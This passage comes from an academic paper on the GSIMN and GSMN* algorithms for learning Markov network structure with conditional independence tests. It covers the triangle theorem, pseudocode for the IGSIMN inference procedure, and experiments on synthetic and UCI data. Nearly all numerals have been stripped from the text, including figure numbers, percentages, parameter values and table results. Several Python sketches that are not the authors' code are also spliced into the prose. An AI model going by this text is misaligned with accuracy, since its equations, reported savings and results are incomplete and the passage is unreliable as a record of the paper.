gsimn is presented. a final difference between gsmn∗ and the abstract gsmn algorithm is the restart actions of the grow and shrink phases of gsmn whenever the current markov blanket is modified (lines and of algorithm ), which are not present in gsmn∗. 
the restarting efficient markov network structure discovery using independence tests figure : illustration of the operation of gsmn∗ using an independence graph. the figure shows the growing phase of variable . variables are examined according to its grow order λ = [ , , , , , , ]. of the loops was necessary in the gs algorithm due to its original usage in learning the structure of bayesian networks. in that task, it was possible for a true member y of the blanket of x to be found initially independent during the grow loop when conditioning on some set s but to be found dependent later when conditioned on a superset s′ ⊃ s. this could happen if y was an “unshielded spouse” of x i.e., if y had one or more common children with x but there existed no direct link between y and x in the underlying bayesian network. however, this behavior is impossible in a domain that has a distribution faithful to a markov network (one of our assumptions): any independence between x and y given s must hold for any superset s′ of s by the axiom of strong union (see eqs. ( )). the restart of the grow and shrink loops is therefore omitted from gsmn∗ in order to save unnecessary tests. note that, even though it is possible that this behavior is impossible in faithful domains, it is possible in unfaithful ones, so we also experimentally evaluated our algorithms in real-world domains in which the assumption of markov faithfulness may not necessarily hold (section ). a proof of correctness of gsmn∗ is presented in appendix a. . independence graphs we can demonstrate the operation of gsmn∗ graphically by the concept of the independence graph, which we now introduce. we define an independence graph to be an undirected graph in which conditional independences and dependencies between single variables are represented by one or more annotated edges between them. a solid (dotted) edge between variables x and y annotated by z represents the fact that x and y have been found dependent (independent) given z. if the conditioning set z is enclosed in parentheses then this edge represents an independence or dependence that was inferred from eqs. ( ) (as opposed to computed from statistical tests). shown graphically: bromberg, margaritis, & honavar x y z (x ⊥⊥y | z) x y z (x⊥⊥y | z) x y (z) (x ⊥⊥y | z) (inferred) x y (z) (x⊥⊥y | z) (inferred) for instance, in figure , the dotted edge between and annotated with “ , ” represents the fact that ( ⊥⊥ | { , }). the absence of an edge between two variables indicates the absence of information about the independence or dependence between these variables under any conditioning set. example . figure illustrates the operation of gsmn∗ using an independence graph in the domain whose underlying markov network is shown in figure . the figure shows the independence graph at the end of the grow phase of the variable , the first in the examination order π. (we do not discuss in this example the initialization phase of gsmn∗; instead, we assume that the examination (π) and grow (λ) orders are as shown in the figure.) according to vertex separation on the underlying network (figure ), variables , , , and are found dependent with during the growing phase i.e., ¬i( , | ∅), ¬i( , | { }), ¬i( , | { , }), ¬i( , | { , , }) and are therefore connected to in the independence graph by solid edges annotated by sets ∅, { }, { , } and { , , } respectively. 
variables , , and are found independent i.e., i( , | { , }), i( , | { , , }), i( , | { , , , }) and are thus connected to by dotted edges annotated by { , }, { , , } and { , , , } respectively. . the triangle theorem in this section we present and prove a theorem that is used in the subsequent gsimn algorithm. as will be seen, the main idea behind the gsimn algorithm is to attempt to de- crease the number of tests done by exploiting the properties of the conditional independence relation in faithful domains i.e., eqs. ( ). these properties can be seen as inference rules that can be used to derive new independences from ones that we know to be true. a careful study of these axioms suggests that only two simple inference rules, stated in the triangle theorem below, are sufficient for inferring most of the useful independence information that can be inferred by a systematic application of the inference rules. this is confirmed in our experiments in section . efficient markov network structure discovery using independence tests figure : independence graph depicting the triangle theorem. edges in the graph are labeled by sets and represent conditional independences or dependencies. a solid (dotted) edge between x and y labeled by z means that x and y are dependent (independent) given z. a set label enclosed in parentheses means the edge was inferred by the theorem. theorem (triangle theorem). given eqs. ( ), for every variable x, y , w and sets z and z such that {x, y, w}∩ z = {x, y, w}∩ z = ∅, (x ⊥⊥w | z ) ∧ (w ⊥⊥y | z ) =⇒ (x ⊥⊥y | z ∩ z ) (x⊥⊥w | z ) ∧ (w ⊥⊥y | z ∪ z ) =⇒ (x⊥⊥y | z ). we call the first relation the “d-triangle rule” and the second the “i-triangle rule.” proof. we are using the strong union and transitivity of eqs. ( ) as shown or in contra- positive form. (proof of d-triangle rule): • from strong union and (x ⊥⊥w | z ) we get (x ⊥⊥w | z ∩ z ). • from strong union and (w ⊥⊥y | z ) we get (w ⊥⊥y | z ∩ z ). • from transitivity, (x ⊥⊥w | z ∩z ), and (w ⊥⊥y | z ∩z ), we get (x ⊥⊥y | z ∩z ). (proof of i-triangle rule): • from strong union and (w ⊥⊥y | z ∪ z ) we get (w ⊥⊥y | z ). • from transitivity, (x⊥⊥w | z ) and (w ⊥⊥y | z ) we get (x⊥⊥y | z ). we can represent the triangle theorem graphically using the independence graph con- struct of section . . figure depicts the two rules of the triangle theorem using two independence graphs. the triangle theorem can be used to infer additional conditional independences from tests conducted during the operation of gsmn∗. an example of this is shown in fig- ure , which illustrates the application of the triangle theorem to the example presented in figure . the independence information inferred from the triangle theorem is shown by curved edges (note that the conditioning set of each such edge is enclosed in parentheses). bromberg, margaritis, & honavar figure : illustration of the use of the triangle theorem on the example of figure . the set of variables enclosed in parentheses correspond to tests inferred by the triangle theorem using the two adjacent edges as antecedents. for example, the result ( ⊥⊥ | { , }), is inferred from the i-triangle rule, independence ( ⊥⊥ | { , }) and dependence ( ⊥⊥ | { , , }). for example, independence edge ( , ) can be inferred by the d-triangle rule from the ad- jacent edges ( , ) and ( , ), annotated by { } and { , , } respectively. the annotation for this inferred edge is { }, which is the intersection of the annotations { } and { , , }. 
an example application of the i-triangle rule is edge ( , ), which is inferred from edges ( , ) and ( , ) with annotations { , } and { , , } respectively. the annotation for this inferred edge is { , }, which is the intersection of the annotations { , , } and { , }. . the gsimn algorithm in the previous section we saw the possibility of using the two rules of the triangle theorem to infer the result of novel tests during the grow phase. the gsimn algorithm (grow-shrink inference-based markov network learning algorithm), introduced in this sec- tion, uses the triangle theorem in a similar fashion to extend gsmn∗ by inferring the value of a number of tests that gsmn∗ executes, making their evaluation unnecessary. gsimn and gsmn∗ work in exactly the same way (and thus the gsimn algorithm shares exactly the same algorithmic description i.e., both follow algorithm ), with all differences between them concentrated in the independence procedure they use: instead of using independence procedure igsmn∗ of gsmn ∗, gsimn uses procedure igsimn, shown in algorithm . pro- cedure igsimn, in addition to attempting to propagate the blanket information obtained from the examination of previous variables (as igsmn∗ does), also attempts to infer the value of the independence test that is provided as its input by either the strong union axiom (listed in eqs. ( )) or the triangle theorem. if this attempt is successful, igsimn returns the value inferred (true or false), otherwise it defaults to a statistical test on the data set (as igsmn∗ does). for the purpose of assisting in the inference process, gsimn and efficient markov network structure discovery using independence tests algorithm igsimn(x, y, s, f, t): calculate independence test result by inference (in- cluding propagation), if possible. record test result in the knowledge base. : /* attempt to infer dependence by propagation. */ : if y ∈ t then : return false : /* attempt to infer independence by propagation. */ : if y ∈ f then : return true : /* attempt to infer dependence by strong union. */ : if ∃(a, false) ∈ kxy such that a ⊇ s then : return false : /* attempt to infer dependence by the d-triangle rule. */ : for all w ∈ s do : if ∃(a, false) ∈ kxw such that a ⊇ s ∧ ∃(b, false) ∈ kw y such that b ⊇ s then : add (a ∩ b, false) to kxy and ky x . : return false : /* attempt to infer independence by strong union. */ : if ∃(a, true) ∈ kxy such that a ⊆ s then : return true : /* attempt to infer independence by the i-triangle rule. */ : for all w ∈ s do : if ∃(a, true) ∈ kxw s.t. a ⊆ s ∧ ∃(b, false) ∈ kw y s.t. b ⊇ a then : add (a, true) to kxy and ky x . : return true : /* else do statistical test on data. */ : t ← (p(x,y |z)>α) /* t = true iff p-value of statistical test (x, y | s) > α. */ : add (s, t) to kxy and ky x . : return t igsimn maintain a knowledge base kxy for each pair of variables x and y , containing the outcomes of all tests evaluated so far between x and y (either from data or inferred). each of these knowledge bases is empty at the beginning of the gsimn algorithm (the initializa- tion step is not shown in the algorithm since gsmn∗ does not use it), and is maintained within the test procedure igsimn. we now explain igsimn (algorithm ) in detail. 
igsimn attempts to infer the in- dependence value of its input triplet (x, y | s) by applying a single step of backward chaining using the strong union and triangle rules i.e., it searches the knowledge base k = {kxy : x, y ∈ v} for antecedents of instances of rules that have the input triplet (x, y | s) as consequent. the strong union rule is used in its direct from as shown in eqs. ( ) and also in its contrapositive form. the direct form can be used to infer indepen- dences, and therefore we refer to it as the i-su rule from here on. in its contrapositive form, the i-su rule becomes (x ⊥⊥y | s ∪ w) =⇒ (x ⊥⊥y | s), referred to as the d-su rule since it can be used to infer dependencies. according to the d-triangle and d-su rules, the dependence (x ⊥⊥y | s) can be inferred if the knowledge base k contains . a test (x ⊥⊥y | a) with a ⊇ s, or . tests (x ⊥⊥w | a) and (w ⊥⊥y | b) for some variable w , with a ⊇ s and b ⊇ s, bromberg, margaritis, & honavar figure : illustration of the operation of gsimn. the figure shows the grow phase of two consecutively examined variables and . the figure shows how the variable examined second is not but , according to the change in the examination order π in lines – of algorithm . the set of variables enclosed in parentheses correspond to tests inferred by the triangle theorem using two adjacent edges as antecedents. the results ( ⊥⊥ | ∅), ( ⊥⊥ | { }), ( ⊥⊥ | { , }), and ( ⊥⊥ | { , , }) in (b), shown highlighted, were not executed but inferred from the tests done in (a). respectively. according to the i-triangle and i-su rules, the independence (x⊥⊥y | s) can be inferred if the knowledge base contains . a test (x⊥⊥y | a) with a ⊆ s, or . tests (x⊥⊥w | a) and (w ⊥⊥y | b) for some variable w , with a ⊆ s and b ⊇ a, respectively. the changes to the grow orders of some variables occur inside the grow phase of the currently examined variable x (lines – of gsimn i.e., algorithm with igsmn∗ re- placed by igsimn.). in particular, if, for some variable y , the algorithm reaches line , i.e., pxy ≤ α and igsimn(x, y, s) = false, then x and all the variables that were found dependent with x before y (i.e., all variables currently in s) are promoted to the beginning of the grow order λy . this is illustrated in figure for variable , which depicts the grow phase of two consecutively examined variables and . in this figure, the curved edges show the tests that are inferred by igsimn during the grow phase of variable . the grow order of changes from λ = [ , , , , , , ] to λ = [ , , , , , , ] after the grow phase of variable is complete because the variables , , and were promoted (in that order) to the beginning of the queue. the rationale for this is the observation that this increases the number of tests inferred by gsimn at the next step: the change in the examination and grow orders described above was chosen so that the inferred tests while learning the blanket of variable match exactly those required by the algorithm in some future step. in efficient markov network structure discovery using independence tests particular, note that in the example the set of inferred dependencies between each variable found dependent with before are exactly those required during initial part of the grow phase of variable , shown highlighted in figure (b) (the first four dependencies). these independence tests were inferred (not conducted), resulting in computational savings. 
in general, the last dependent variable of the grow phase of x has the maximum number of dependences and independences inferred and this provides the rationale for its change in grow order and its selection by the algorithm to be examined next. it can be shown that under the same assumptions as gsmn∗, the structure returned by gsimn is the correct one i.e., each set bx computed by the gsimn algorithm equals exactly the neighbors of x. the proof of correctness of gsimn is based on correctness of gsmn∗ and is presented in appendix b. . gsimn technical implementation details in this section we discuss a number of practical issues that subtly influence the accuracy and efficiency of an implementation of gsimn. one is the order of application of the i-su, d-su, i-triangle and d-triangle rules within the function igsimn. given an independence-query oracle, the order of application should not matter—assuming there are more than one rules for inferring the value of an independence, all of them are guaranteed to produce the same value due to the soundness of the axioms of eqs. ( ) (pearl, ). in practice however, the oracle is implemented by statistical tests conducted on data which can be incorrect, as previously mentioned. of particular importance is the observation that false independences are more likely to occur than false dependencies. one example of this is the case where the domain dependencies are weak—in this case any pair of variables connected (dependent) in the underlying true network structure may be incorrectly deemed independent if all paths between them are long enough. on the other hand, false dependencies are much more rare— the confidence threshold of −α = . of a statistical test tells us that the probability of a false dependence by chance alone is only %. assuming i.i.d. data for each test, the chance of multiple false dependencies is even lower, decreasing exponentially fast. this practical observation i.e., that dependencies are typically more reliable than independences, provide the rationale for the way the igsimn algorithm works. in particular, igsimn prioritizes the application of rules whose antecedents contain dependencies first i.e., the d-triangle and d-su rules, followed by the i-triangle and i-su rules. in effect, this uses statistical results that are typically known with greater confidence before ones that are usually less reliable. the second practical issue concerns efficient inference. the gsimn algorithm uses a one- step inference procedure (shown in algorithm ) that utilizes a knowledge base k = {kxy } containing known independences and dependences for each pair of variables x and y . to implement this inference efficiently we utilize a data structure for k for the purpose of storing and retrieving independence facts in constant time. it consists of two d arrays, one for dependencies and another for independencies. each array is of n × n size, where n is the number of variables in the domain. each cell in this array corresponds to a pair of variables (x, y ), and stores the known independences (dependences) between x and y in the form of a list of conditioning sets. for each conditioning set z in the list, the knowledge base kxy represents a known independence (x⊥⊥y | z) (dependence (x ⊥⊥y | z)). it is important to note that the length of each list is at most , as there are no more than two bromberg, margaritis, & honavar tests done between any variable x and y during the execution of gsimn (done during the growing and shrinking phases). 
thus, it always takes a constant time to retrieve/store an independence (dependence), and therefore all inferences using the knowledge base are constant time as well. also note that all uses of the strong union axion by the igsimn algorithm are constant time as well, as they can be accomplished by testing the (at most two) sets stored in kxy for subset or superset inclusion. . experimental results we evaluated the gsmn∗ and gsimn algorithms on both artificial and real-world data sets. through the experimental results presented below we show that the simple application of pearl’s inference rules in gsimn algorithm results in a significant reduction in the number of tests performed when compared to gsmn∗ without adversely affecting the quality of the output network. in particular we report the following quantities: • weighted number of tests. the weighted number of tests is computed by the summation of the weight of each test executed, where the weight of test (x, y | z) is defined as +|z|. this quantity reflects the time complexity of the algorithm (gsmn∗ or gsimn) and can be used to assess the benefit in gsimn of using inference instead of executing statistical tests on data. this is the standard method of comparison of independence-based algorithms and it is justified by the observation that the running time of a statistical test on triplet (x, y | z) is proportional to the size n of the data set and the number of variables involved in it i.e., o(n (|z|+ )) (and is not exponential in the number of variables involved as a näıve implementation might assume). this is because one can construct all non-zero entries in the contingency table used by the test by examining each data point in the data set exactly once, in time proportional to the number of variables involved in the test i.e., proportional to |{x, y }∪z| = +|z|. • execution time. in order to assess the impact of inference in the running time (in addition to the impact of statistical tests), we report the execution time of the algorithm. • quality of the resulting network. we measure quality in two ways. – normalized hamming distance. the hamming distance between the output network and the structure of the underlying model is another measure of the quality of the output network, when the actual network that was used to generate the data is known. the hamming distance is defined as the number of “reversed” edges between these two network structures, i.e., the number of times an actual edge in the true network is missing in the returned network or an edge absent from the true network exists in the algorithm’s output network. a value zero means that the output network has the correct structure. to be able to compare domains of different dimensionalities (number of variables n) we normalize it by ( n ) , the total number of node pairs in the corresponding domain. – accuracy. for real-world data sets where the underlying network is unknown, no hamming distance calculation is possible. in this case it is impossible to know the true value of any independence. we therefore approximate it by a statistical test on the entire data set, and use a limited, randomly chosen subset ( / of the data set) to learn the network. to measure accuracy we compare the result efficient markov network structure discovery using independence tests (true or false) of a number of conditional independence tests on the network output (using vertex separation), to the same tests performed on the full data set. 
in all experiments involving data sets we used the χ2 statistical test for the estimation of conditional independences. as mentioned above, rules of thumb exist that deem certain tests as potentially unreliable depending on the counts of the contingency table involved; for example, one such rule (cochran, ) deems a test unreliable if more than % of the cells of the contingency table have fewer than data points in the test. due to the requirement that an answer must be obtained by an independence algorithm conducting a test, we used the outcomes of such tests as well in our experiments. the effect of these possibly unreliable tests on the quality of the resulting network is measured by our accuracy measures, listed above. in the next section we present results for domains in which the underlying probabilistic model is known. this is followed by real-world data experiments where no model structure is available.
. known-model experiments
in the first set of experiments the underlying model, called the true model or true network, is a known markov network. the purpose of this set of experiments is to conduct a controlled evaluation of the quality of the output network through a systematic study of the algorithms' behavior under varying conditions of domain size (number of variables) and amount of dependencies (average node degree in the network). each true network that contains n variables was generated randomly as follows: the network was initialized with n nodes and no edges. a user-specified parameter of the network structure is the average node degree τ, which equals the average number of neighbors per node. given τ, for every node its set of neighbors was determined randomly and uniformly by selecting the first τn/2 pairs in a random permutation of all possible pairs. the factor 1/2 is necessary because each edge contributes to the degree of two nodes. we conducted two types of experiments using known network structure: exact learning experiments and sample-based experiments.
. . exact learning experiments
in this set of known-model experiments, we assume that the results of all statistical queries asked by the gsmn∗ and gsimn algorithms were available, which assumes the existence of an oracle that can answer independence queries. when the underlying model is known, this oracle can be implemented through vertex separation. the benefits of querying the true network for independence are twofold: first, it ensures faithfulness and correctness of the independence query results, which allows the evaluation of the algorithms under their assumptions for correctness. second, these tests can be performed much faster than actual statistical tests on data. this allowed us to evaluate our algorithms in large networks—we were able to conduct experiments on domains containing up to variables. we first report the weighted number of tests executed by gsmn∗ with and without propagation and gsimn. our results are summarized in figure , which shows the ratio between the weighted number of tests of gsimn and the two versions of gsmn∗.
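a minimal python sketch of this experimental setup (random structure generation with a target average degree, plus a vertex-separation independence oracle) is given below; the adjacency-set representation and the function names are our own assumptions, not the authors' code:

import itertools
import random
from collections import deque


def random_structure(n, tau, rng=random.Random(0)):
    """Random undirected structure over n nodes with average degree tau:
    take a random permutation of all node pairs and keep the first
    tau * n / 2 of them (each edge adds one to the degree of two nodes)."""
    pairs = list(itertools.combinations(range(n), 2))
    rng.shuffle(pairs)
    adj = {v: set() for v in range(n)}
    for a, b in pairs[: round(tau * n / 2)]:
        adj[a].add(b)
        adj[b].add(a)
    return adj


def vertex_separated(adj, x, y, z):
    """Independence oracle for a known structure: x and y are independent
    given z iff removing z disconnects x from y (breadth-first search that
    never enters z).  z is assumed not to contain x or y."""
    blocked = set(z)
    seen, queue = {x}, deque([x])
    while queue:
        v = queue.popleft()
        for w in adj[v]:
            if w == y:
                return False           # found an unblocked path to y
            if w not in blocked and w not in seen:
                seen.add(w)
                queue.append(w)
    return True                        # y unreachable once z is removed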
figure : ratio of the weighted number of tests of gsimn over gsmn∗ without propagation (left plot) and with propagation (right plot) for network sizes (number of nodes) up to n = of average degree τ = , , , and .
algorithm ifch(x, y, s, f, t). forward-chaining implementation of independence test igsimn(x, y, s, f, t).
: /* query knowledge base. */
: if ∃(s, t) ∈ kxy then
: return t
: t ← result of test (x, y | s) /* t = true iff test (x, y | s) returns independence. */
: add (s, t) to kxy and kyx.
: run forward-chaining inference algorithm on k, update k.
: return t
one hundred true networks were generated randomly for each pair (n, τ), and the figure shows the mean value. we can see that the limiting reduction (as n grows large) in weighted number of tests depends primarily on the average degree parameter τ. the reduction of gsimn for large n and dense networks (τ = ) is approximately % compared to gsmn∗ with propagation and % compared to gsmn∗ without the propagation optimization, demonstrating the benefit of gsimn vs. gsmn∗ in terms of number of tests executed. one reasonable question about the performance of gsimn is to what extent its inference procedure is complete, i.e., from all those tests that gsimn needs during its operation, how does the number of tests that it infers (by applying a single step of backward chaining on the strong union axiom and the triangle theorem, rather than executing a statistical test on data) compare to the number of tests that can be inferred (for example using a complete automated theorem prover on eqs. ( ))? to measure this, we compared the number of tests done by gsimn with the number done by an alternative algorithm, which we call gsimn-fch (gsimn with forward chaining). gsimn-fch differs from gsimn in function ifch, shown in algorithm , which replaces function igsimn of gsimn. ifch exhaustively produces all independence statements that can be inferred through the properties of eqs. ( ) using a forward-chaining procedure. this process iteratively builds a knowledge base k containing the truth value of conditional independence predicates. whenever the outcome of a test is required, k is queried (line of ifch in algorithm ). if the value of the test is found in k, it is returned (line ). if not, gsimn-fch performs the test and uses the result in a standard forward-chaining automatic theorem prover subroutine (line ) to produce all independence statements that can be inferred by the test result and k, adding these new facts to k.
figure : ratio of number of tests of gsimn-fch over gsimn for network sizes (number of variables) n = to n = and average degrees τ = , , , and .
a comparison of the number of tests executed by gsimn vs. gsimn-fch is presented in figure , which shows the ratio of the number of tests of gsimn over gsimn-fch. the figure shows the mean value over four runs, each corresponding to a network generated randomly for each pair (n, τ), for τ = , , and and n up to . unfortunately, after two days of execution gsimn-fch was unable to complete execution on domains containing variables or more. we therefore present results for domain sizes up to only. the figure shows that for n ≥ , and every τ the ratio is exactly , i.e., all tests inferable were produced by the use of the triangle theorem in gsimn.
for smaller domains, the ratio is above . with the exception of a single case, (n = , τ = ).
. . sample-based experiments
in this set of experiments we evaluate gsmn∗ (with and without propagation) and gsimn on data sampled from the true model. this allows a more realistic assessment of the performance of our algorithms. the data were sampled from the true (known) markov network using gibbs sampling. in the exact learning experiments of the previous section only the structure of the true network was required, generated randomly in the fashion described above. to sample data from a known structure, however, one also needs to specify the network parameters. for each random network, the parameters determine the strength of dependencies among connected variables in the graph. following agresti ( ), we used the log-odds ratio as a measure of the strength of the probabilistic influence between two binary variables x and y, defined as
θxy = log [ pr(x = 0, y = 0) pr(x = 1, y = 1) / ( pr(x = 0, y = 1) pr(x = 1, y = 0) ) ].
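as a small illustrative sketch, the quantity can be computed from the joint distribution of a pair of binary variables as follows (the dictionary layout of the joint is an assumption of ours):

import math


def log_odds_ratio(joint):
    """Log-odds ratio of two binary variables x and y, with their joint
    distribution given as a dict keyed by (x, y) value pairs.  Values near
    zero indicate weak dependence; large magnitudes indicate strong dependence."""
    return math.log(
        (joint[(0, 0)] * joint[(1, 1)]) / (joint[(0, 1)] * joint[(1, 0)])
    )


# example: a weakly coupled pair of binary variables
print(log_odds_ratio({(0, 0): 0.3, (0, 1): 0.2, (1, 0): 0.2, (1, 1): 0.3}))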
figure : normalized hamming distances between the true network and the network output by gsmn∗ (with and without propagation) and gsimn for domain size n = and average degrees τ = , , , .
the network parameters were generated randomly so that the log-odds ratio between every pair of variables connected by an edge in the graph has a specified value. in this set of experiments, we used values of θ = , θ = . and θ = for every such pair of variables in the network. figures and show plots of the normalized hamming distance between the true network and that output by gsmn∗ (with and without propagation) and gsimn for domain sizes of n = and n = variables, respectively. these plots show that the hamming distance of gsimn is comparable to the ones of the gsmn∗ algorithms for both domain sizes n = and n = , all average degrees τ = , , , and log-odds ratios θ = , θ = . and θ = .
figure : normalized hamming distance results as in figure but for domain size n = .
figure : weighted number of tests executed by gsmn∗ (with and without propagation) and gsimn for |d| = , , for domain sizes n = and , average degree parameters τ = , , , and , and log-odds ratios θ = , , , and .
this reinforces the claim that inference done by gsimn has a small impact on the quality of the output networks. figure shows the weighted number of tests of gsimn vs. gsmn∗ (with and without propagation) for a sampled data set of , points for domains n = and n = , average degree parameters τ = , , , and , and log-odds ratios θ = , . and . gsimn shows a reduced weighted number of tests with respect to gsmn∗ without propagation in all cases and compared to gsmn∗ with propagation in most cases (with the only exceptions of (τ = , θ = ) and (τ = , θ = . )). for sparse networks and weak dependences, i.e., τ = , this reduction is larger than % for both domain sizes, a reduction much larger than the one observed for the exact learning experiments. the actual execution times for various data set sizes and network densities are shown in figure for the largest domain of n = , and θ = , verifying the reduction in cost of gsimn for various data set sizes. note that the reduction is proportional to the number of data points; this is reasonable as each test executed must go over the entire data set once to construct the contingency table.
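the single-pass construction mentioned above can be sketched in a few lines of python; the function name and the dict-per-record data layout are our assumptions:

from collections import Counter


def contingency_table(data, x, y, z):
    """Build the (sparse) contingency table for the test (x, y | z) in one
    pass over the data: each record contributes one count to the cell indexed
    by its values on the |{x, y} ∪ z| involved columns, so the total work is
    proportional to the data set size times (|z| + 2)."""
    cols = (x, y) + tuple(z)
    counts = Counter()
    for record in data:                      # record: dict mapping column -> value
        counts[tuple(record[c] for c in cols)] += 1
    return counts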
this confirms our claim that the cost of inference of gsimn is small (constant time per test, see discussion in section . ) compared to the execution time of the tests themselves, and indicates increasing cost benefits of the use of gsimn even for large data sets.
figure : execution times for sampled data experiments for θ = , τ = , (top row) and τ = , (bottom row) for a domain of n = variables.
. . real-world network sampled data experiments
we also conducted sampled data experiments on well-known real-world networks. as there is no known repository of markov networks drawn from real-world domains, we instead utilized well-known bayesian networks that are widely used in bayesian network research and are available from a number of repositories. to generate markov networks from these bayesian network structures we used the process of moralization (lauritzen, ), which consists of two steps: (a) connect each pair of nodes in the bayesian network that have a common child with an undirected edge, and (b) remove the directions of all edges. this results in a markov network in which the local markov property is valid, i.e., each node is conditionally independent of all other nodes in the domain given its direct neighbors. during this procedure some conditional independences may be lost. this, however, does not affect the accuracy results because we compare the independencies of the output network with those of the moralized markov network (as opposed to the bayesian network). we conducted experiments using real-world domains: hailfinder, insurance, alarm, mildew, and water. for each domain we sampled a varying number of data points from its corresponding bayesian network using logic sampling (henrion, ), and used it as input to the gsmn∗ (with and without propagation) and gsimn algorithms. we then compared the network output from each of these algorithms to the original moralized network using the normalized hamming distance metric previously described. the results are shown in . we used http://compbio.cs.huji.ac.il/repository/, accessed on december , .
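the two moralization steps described above can be illustrated with a short python sketch; the parent-set representation of the bayesian network and the function name are assumptions of ours:

def moralize(parents):
    """Moralize a Bayesian network given as {node: set of parents}:
    (a) marry every pair of parents that share a child, and (b) drop edge
    directions.  Returns an undirected adjacency structure."""
    nodes = set(parents) | {p for ps in parents.values() for p in ps}
    adj = {v: set() for v in nodes}
    for child, ps in parents.items():
        for p in ps:                          # step (b): undirected parent-child edges
            adj[child].add(p)
            adj[p].add(child)
        ps = list(ps)
        for i in range(len(ps)):              # step (a): connect co-parents
            for j in range(i + 1, len(ps)):
                adj[ps[i]].add(ps[j])
                adj[ps[j]].add(ps[i])
    return adj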
figure : normalized hamming distance of the network output by gsmn∗ (with and without propagation) and gsimn with respect to the true markov networks, using varying data set sizes sampled from markov networks for various real-world domains modeled by bayesian networks.
fig. and indicate that the distances produced from the three algorithms are similar. in some cases (e.g., water and hailfinder) the network resulting from the use of gsimn is actually better (of smaller hamming distance) than the ones output by the gsmn∗ algorithms. we also measured the weighted cost of the three algorithms for each of these domains, shown in fig. . the plots show a significant decrease in the weighted number of tests for gsimn with respect to both gsmn∗ algorithms: the cost of gsimn is % of the cost of gsmn∗ without propagation on average, a savings of %, while the cost of gsimn is % of the cost of gsmn∗ with propagation on average, a savings of %.
figure : weighted cost of tests conducted by the gsmn∗ (with and without propagation) and gsimn algorithms for various real-world domains modeled by bayesian networks.
. real-world data experiments
while the artificial data set studies of the previous section have the advantage of allowing a more controlled and systematic study of the performance of the algorithms, experiments on real-world data are necessary for a more realistic assessment of their performance. real data are more challenging because they may come from non-random topologies (e.g., a possibly irregular lattice in many cases of spatial data) and the underlying probability distribution may not be faithful. we conducted experiments on a number of data sets obtained from the uci machine learning data set repository (newman, hettich, blake, & merz, ). continuous variables in the data sets were discretized using a method widely recommended in introductory statistics texts (scott, ); it dictates that the optimal number of equally-spaced discretization bins for each continuous variable is k = + log n, where n is the number of points in the
data set. for each data set and each algorithm, we report the weighted number of conditional independence tests conducted to discover the network and the accuracy, as defined below.
figure : ratio of the weighted number of tests of gsimn versus gsmn∗ and difference between the accuracy of gsimn and gsmn∗ on real data sets. ratios smaller than and positive bars indicate an advantage of gsimn over gsmn∗. the numbers on the x-axis are indices of the data sets as shown in table .
table : weighted number of tests and accuracy for several real-world data sets. for each evaluation measure, the best performance between gsmn∗ (with and without propagation) and gsimn is indicated in bold. the number of variables in the domain is denoted by n and the number of data points in each data set by n.
# name | n | n | weighted number of tests: gsmn∗ (w/o prop.), gsmn∗ (w/ prop.), gsimn | accuracy: gsmn∗ (w/o prop.), gsmn∗ (w/ prop.), gsimn
echocardiogram . . .
ecoli . . .
lenses . . .
hayes-roth . . .
hepatitis . . .
cmc . . .
balance-scale . . .
baloons . . .
flag . . .
tic-tac-toe . . .
bridges . . .
car . . .
monks- . . .
haberman . . .
nursery . . .
crx . . .
imports- . . .
dermatology . . .
adult . . .
because for real-world data the structure of the underlying bayesian network (if any) is unknown, it is impossible to measure the hamming distance of the resulting network structure. instead, we measured the estimated accuracy of a network produced by gsmn∗ or gsimn by comparing the result (true or false) of a number of conditional independence tests on the network learned by them (using vertex separation) to the result of the same tests performed on the data set (using a χ2 test). this approach is similar to estimating accuracy in a classification task over unseen instances, but with inputs here being triplets (x, y, z) and the class attribute being the value of the corresponding conditional independence test. we used / of the real-world data set (randomly sampled) as input to gsmn∗ and gsimn and the entire data set for the χ2 test. this corresponds to the hypothetical scenario that a much smaller data set is available to the researcher, and approximates the true value of the test by its outcome on the entire data set. since the number of possible tests is exponential, we estimated the independence accuracy by sampling , triplets (x, y, z) randomly, evenly distributed among all possible conditioning set sizes m ∈ { , . . . , n − } (i.e., /(n − ) tests for each m). each of these triplets was constructed as follows: first, two variables x and y were drawn randomly from v. second, the conditioning set was determined by picking the first m variables from a random permutation of v − {x, y}. denoting by t this set of , triplets, by t ∈ t a triplet, by idata(t) the result of a test performed on the entire data set, and by inetwork(t) the result of a test performed on the network output by either gsmn∗ or gsimn, the estimated accuracy is defined as
estimated accuracy = |{ t ∈ t | inetwork(t) = idata(t) }| / |t|.
for each of the data sets, table shows the detailed results for accuracy and the weighted number of tests for the gsmn∗ and gsimn algorithms.
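as an aside, a rough python sketch of this accuracy estimate is given below; it takes the two independence oracles (network-based and data-based) as callables, and the triplet-sampling details are a simplification of the procedure described above rather than an exact reproduction:

import random


def estimated_accuracy(variables, indep_in_network, indep_in_data,
                       num_triplets, rng=random.Random(0)):
    """Estimate network accuracy by sampling random triplets (x, y | z) over
    all conditioning-set sizes and comparing the answer read off the learned
    network (e.g. by vertex separation) with the answer of a statistical test
    on the full data set."""
    n, hits = len(variables), 0
    for _ in range(num_triplets):
        m = rng.randrange(n - 1)                      # conditioning-set size
        perm = rng.sample(variables, len(variables))  # random permutation
        x, y = perm[0], perm[1]
        z = perm[2:2 + m]
        hits += indep_in_network(x, y, z) == indep_in_data(x, y, z)
    return hits / num_triplets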
these results are also plotted in figure , with the horizontal axis indicating the data set index appearing in the first column of table . figure plots two quantities in the same graph for these real-world data sets: the ratio of the weighted number of tests of gsimn versus the two gsmn∗ algorithms and the difference of their accuracies. for each data set, an improvement of gsimn over gsmn∗ corresponds to a number smaller than for the ratios and a positive histogram bar for the accuracy differences. we can observe that gsimn reduced the weighted number of tests on every data set, with maximum savings of % over gsmn∗ without propagation (for the “crx” data set) and % over gsmn∗ with propagation (for the “crx” data set as well). moreover, in out of data sets gsimn resulted in improved accuracy, in a tie, and only in somewhat reduced accuracy compared to gsmn∗ with propagation (for the “nursery” and “balance-scale” data sets).
. conclusions and future research
